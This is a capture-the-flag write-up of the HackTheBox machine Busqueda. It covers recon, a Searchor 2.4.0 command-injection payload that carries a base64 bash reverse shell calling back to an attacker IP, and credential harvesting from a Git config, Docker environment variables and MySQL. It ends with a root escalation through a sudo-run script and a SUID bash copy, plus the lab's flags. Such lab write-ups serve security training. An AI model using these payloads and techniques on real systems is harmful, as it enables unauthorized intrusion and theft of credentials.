htb-writeups

Busqueda - HackTheBox Writeup

Overview

Busqueda is a Linux-based machine from HackTheBox that involves exploiting a vulnerable web application, leveraging Git configuration exposure, and abusing sudo privileges to escalate to root access.

Reconnaissance

Initial Nmap Scan

export target=10.129.16.87
sudo nmap -p- --min-rate 5000 -sT -vvv $target

image

image

Results:

Service Version Detection

sudo nmap -sC -sV -p 22,80 -T4 $target

image

Detailed Findings:

Web Application Enumeration

Added the domain to hosts file:

sudo nano /etc/hosts
# Add: 10.129.16.87 searcher.htb

Visited http://searcher.htb and discovered:

image

Testing Search Functionality

image

Initial Access

Vulnerability Research

Researched Searchor 2.4.0 exploits and found:

Reverse Shell Preparation

# Generate base64 encoded reverse shell
echo -ne "bash -c 'bash -i >& /dev/tcp/10.10.14.172/4444 0>&1'" | base64
# Output: YmFzaCAgLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTcyLzQ0NDQgMD4mMSc=

image

Craft Exploit Payload

evil_cmd="',__import__('os').system('echo YmFzaCAgLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTcyLzQ0NDQgMD4mMSc= | base64 -d | bash -i')) # junky comment"

image

Start Netcat Listener

nc -nlvp 4444

Execute Exploit

curl -s -X POST http://searcher.htb/search -d "engine=Google&query=${evil_cmd}"

Shell Obtained

Successfully received reverse shell connection as user svc

image

Privilege Escalation

Initial Enumeration

whoami
# svc

pwd
# /var/www/app

ls -la

Discover Git Configuration

cat /var/www/app/.git/config

image

Found Credentials:

url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git

Add Gitea to Hosts

echo "10.129.16.87 gitea.searcher.htb" >> /etc/hosts

Access Gitea

with codys creds we can login to http://gitea.searcher.htb/user/login?redirect_to=%2f

image

image

Check Sudo Privileges

sudo -l

Note:Use codys’ password image

Output:

Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin,
    use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

Analyze System-Checkup Script

sudo /usr/bin/python3 /opt/scripts/system-checkup.py ara

Script Usage:

Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inspect a certain docker container
     full-checkup  : Run a full system checkup

Enumerate Docker Containers

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps

image

Results:

CONTAINER ID   IMAGE                COMMAND                  CREATED       STATUS          PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   2 years ago   Up 53 minutes   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   2 years ago   Up 53 minutes   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

Inspect Gitea Container for Credentials

sudo python3 /opt/scripts/system-checkup.py docker-inspect '' gitea | jq .

image

Extracted Database Credentials from Environment:

"Env": [
  "USER_UID=115",
  "USER_GID=121", 
  "GITEA__database__DB_TYPE=mysql",
  "GITEA__database__HOST=db:3306",
  "GITEA__database__NAME=gitea",
  "GITEA__database__USER=gitea",
  "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh"
]

Get MySQL Container IP

sudo python3 /opt/scripts/system-checkup.py docker-inspect '' mysql_db | jq .

image

Network Information:

{
  "docker_gitea": {
    "IPAMConfig": null,
    "Links": null,
    "Aliases": [
      "f84a6b33fb5a",
      "db"
    ],
    "NetworkID": "cbf2c5ce8e95a3b760af27c64eb2b7cdaa71a45b2e35e6e03e2091fc14160227",
    "EndpointID": "c7fbd5f328719c833cbc947cae5b3244d831e7b010f5ef34881b483a8e6f65be",
    "Gateway": "172.19.0.1",
    "IPAddress": "172.19.0.3",
    "IPPrefixLen": 16,
    "IPv6Gateway": "",
    "GlobalIPv6Address": "",
    "GlobalIPv6PrefixLen": 0,
    "MacAddress": "02:42:ac:13:00:03",
    "DriverOpts": null
  }
}

Access MySQL Database

mysql -h 172.19.0.3 -u gitea -pyuiu1hoiu4i5ho1uh gitea

image

Extract User Information

select * from users \G;

image

Found Administrator Hash:

ba598d99c2202491d36ecf13d5c28b74e2738b07286edc7388a2fc870196f6c4da6565ad9ff68b1d28a31eeedb1554b5dcc2

Password Reuse Check

Discovered that the database password yuiu1hoiu4i5ho1uh was reused for the administrator account.

Analyze Scripts Repository

Examined scripts in the Gitea repository maintained by administrator.

Exploit Full-Checkup Vulnerability

Discovered that full-checkup executes scripts from current directory with root privileges.

image

Create Exploit Script:

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/path\nchmod 4777 /tmp/path' > full-checkup.sh
chmod +x full-checkup.sh

image

Execute Privilege Escalation

sudo python3 /opt/scripts/system-checkup.py full-checkup

Gain Root Access

/tmp/path -p

Verify Root Privileges:

id
whoami
hostname
uname -r

image

Flag Collection

User Flag

cat /home/svc/user.txt

User Flag: bfb79950c22bba32320a294953bbf4c2

Root Flag

cat /root/root.txt

Root Flag: e3f07a7de0fc9535337534b7b01bdabd

Conclusion

Attack Path Summary:

  1. Information Gathering: Nmap scans revealed SSH and HTTP services
  2. Web Application Analysis: Discovered Searchor 2.4.0 vulnerable to command injection
  3. Initial Compromise: Exploited command injection to gain reverse shell as svc user
  4. Lateral Movement: Found Git credentials leading to Gitea access
  5. Privilege Escalation:
    • Abused sudo permissions to run system-checkup script
    • Extracted database credentials from Docker container
    • Discovered password reuse
    • Exploited full-checkup functionality to gain root access

Security Issues Identified:

Mitigation Recommendations:

This writeup documents the complete penetration testing process for educational purposes. Always ensure you have proper authorization before testing systems.